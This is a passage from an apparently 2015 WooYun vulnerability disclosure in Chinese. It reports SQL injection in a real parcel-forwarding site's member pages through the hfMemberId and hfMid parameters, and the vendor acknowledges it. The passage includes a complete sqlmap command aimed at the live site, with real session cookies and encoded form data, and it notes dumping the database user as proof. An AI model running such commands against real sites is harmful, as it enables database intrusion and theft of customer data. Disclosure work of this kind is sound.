PSJjZW50ZXIiPuacquS9v%2BeUqDwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPuS4reWbvTwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPjIwMTUtMDQtMjE8L3RkPjwvdHI%2BPHRyICBiZ2NvbG9yPSIjRkZGRkZGIiBvbk1vdXNlT3Zlcj0idGhpcy5zdHlsZS5iYWNrZ3JvdW5kPScjREVFRkZFJyIgb25Nb3VzZU91dD0idGhpcy5zdHlsZS5iYWNrZ3JvdW5kPScjRkZGRkZGJyI%2BPHRkIGFsaWduPSJjZW50ZXIiIGhlaWdodD0iMjciPjlRWDdQS1UwMU88L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4kMy4wMDwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPjIwMTUtMDYtMTU8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj7mnKrkvb%2FnlKg8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj7kuK3lm708L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4yMDE1LTA0LTIxPC90ZD48L3RyPjx0ciAgYmdjb2xvcj0iI0ZGRkZGRiIgb25Nb3VzZU92ZXI9InRoaXMuc3R5bGUuYmFja2dyb3VuZD0nI0RFRUZGRSciIG9uTW91c2VPdXQ9InRoaXMuc3R5bGUuYmFja2dyb3VuZD0nI0ZGRkZGRiciPjx0ZCBhbGlnbj0iY2VudGVyIiBoZWlnaHQ9IjI3Ij44QkdPMlE5UDNBPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BJDMuMDA8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4yMDE1LTA2LTE1PC90ZD48dGQgYWxpZ249ImNlbnRlciI%2B5pyq5L2%2F55SoPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2B5Lit5Zu9PC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BMjAxNS0wNC0yMTwvdGQ%2BPC90cj5kAgYPZBYCZg8WAh8ABZAMIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MjA5MTM4MzEwOCZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Sb21hbnRpYzwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTMxMjU0NjA5NDYmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RW1tYTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTIzNjM5MDA5NzcmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9QW5nZWxpbmE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yOTA0MDEzMjU0JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFsaXNhPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49Mjc1MzQxOTYyNSZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Bbm5hPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MzAzNjkxNzIyJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUVsdmlyYTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTMxNTA4OTQ2NzMmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RGVtaTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTExMDE1MjA4MjUmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9TWFuZHk8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yOTkzNDMzMjUzJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvVNvcmFrYTwvYT48L2xpPmRk4L%2FbdXxdZjeq%2F0ryi%2F%2B2HH%2FEcNLLSAK%2BQILsSXCaGJ4%3D&hfMemberId=5219&memberLeft1%24HiddenField1=0&memberLeft1%24HiddenField2=0&ddlIsUsed=&btnSelect=%E6%9F%A5+%E8%AF%A2"
参数:hfMemberId 存在注入
结果

3.jpg


注入点二:
关税信息的地方

2.png


点击查询,截包,放sqlmap
sqlmap -u "www.yundaex.us/Member/GuanShuiList.aspx?m=17" --cookie "ASP.NET_SessionId=3iehzmofoi2zparbwkgptkib; safedog-flow-item=41C74757AA5D4FFA6B32733D76F9EB51; CNZZDATA1253039080=187766858-1429603298-%7C1429619965; Hm_lvt_58f731f2019a9b3ab2c7c14a1b65e037=1429607040; Hm_lpvt_58f731f2019a9b3ab2c7c14a1b65e037=1429623977" --data "__VIEWSTATE=%2FwEPDwUKLTgwMzg5MDkwMg9kFgICAQ9kFggCAQ9kFhBmDxYCHgRUZXh0BQxhbnN3ZXJhbnN3ZXJkAgIPFgIfAAVoPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MjkiPue9kei0rei9rOi%2FkOacjeWKoeWPiuaUtui0uTwvYT48L2Rpdj5kAgQPFgIfAAWEBTxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTM4Ij7lhY3otKPmnaHmrL48L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzkiPuacjeWKoeadoeasvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00MCI%2B5L%2Bd6Zmp5LiO6LWU5LuY5p2h5qy%2BPC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTEzIj7npoHlr4Tnianlk4HojIPlm7Q8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDMiPuW4uOingemXrumimDwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0xNiI%2B5a%2BE5Lu25rOo5oSP5LqL6aG5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTQyIj7pmpDnp4HmnaHmrL48L2E%2BPC9kaXY%2BZAIGDxYCHwAF4gI8ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0yIj7ph43opoHlhazlkYo8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MSI%2B6Z%2B16L6%2B5paw6Ze7PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTMyIj7ooYzkuJrotYTorq88L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzMiPue%2BjuWbvemftei%2BvjwvYT48L2Rpdj5kAggPFgIfAAVYPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MyI%2B6Z%2B16L6%2B566A5LuLPC9hPjwvZGl2PmQCCg8WAh8ABbgBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzQiPuWmguS9leWKoOebn%2Bmftei%2BvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NCI%2B5ZWG5Yqh5ZCI5L2cPC9hPjwvZGl2PmQCDA8WAh8AZWQCDg8WAh8ABbIBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDUiPuS8mOaDoOS%2FoeaBrzwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NiI%2B5rW35reY572R56uZPC9hPjwvZGl2PmQCAg9kFgICAw8WAh8ABckBPGRpdiAgc3R5bGU9InBhZGRpbmc6M3B4Ij48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdHh4LmFzcHg%2FaWQ9MTE1IiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9Ii9hZG1pbi95ZE5ld3MvdXBpbWcvMjAxNTAzMTcyMDQzMjAxNzQvMjAxNTAzMTcyMDQzMjAxNzUxLmpwZyIgd2lkdGg9IjE0MCIgaGVpZ2h0PSI1NSIgLz48L2E%2BPC9kaXY%2BZAIGDxYCHwBlZAIHD2QWAmYPFgIfAAWQDCA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTIwOTEzODMxMDgmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9Um9tYW50aWM8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMDM2OTE3MjImYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RWx2aXJhPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49Mjk5MzQzMzI1MyZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Tb3Jha2E8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yNzUzNDE5NjI1JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFubmE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yMzYzOTAwOTc3JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFuZ2VsaW5hPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MTEwMTUyMDgyNSZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71NYW5keTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTI5MDQwMTMyNTQmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9QWxpc2E8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMTI1NDYwOTQ2JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUVtbWE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMTUwODk0NjczJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvURlbWk8L2E%2BPC9saT5kZJUr7q50HOu2ECsQKqFVBUPIJ2%2B8erGXmTRuQTIv1hjj&hfMid=5219&memberLeft1%24HiddenField1=0&memberLeft1%24HiddenField2=0&txtsubnumber=&ddl_PayState=0&btnSelect=%E6%9F%A5%E8%AF%A2" --dbs
参数:hfMid 存在注入
这次就用 当前用户来证明

4.png


建议对这套程序做整体测试,感觉问题很多

修复方案:

做整体的修改吧,问题多啊

版权声明:转载请注明来源 answer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-22 17:34

厂商回复:

感谢支持,立即修复

最新状态:

暂无